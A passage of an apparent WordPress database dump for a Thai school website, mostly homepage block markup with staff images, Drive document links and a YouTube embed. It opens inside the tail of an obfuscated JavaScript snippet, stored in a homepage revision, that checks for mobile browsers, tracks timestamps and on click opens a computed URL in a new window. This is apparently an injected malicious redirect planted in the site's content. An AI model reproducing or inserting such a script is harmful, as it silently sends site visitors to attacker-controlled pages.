_0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 15:59:27','2025-07-15 08:59:27','',19,'http://watprato.ssk.in.th/?p=702',0,'revision','',0),
(704,1,'2025-07-15 16:05:47','2025-07-15 09:05:47','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f 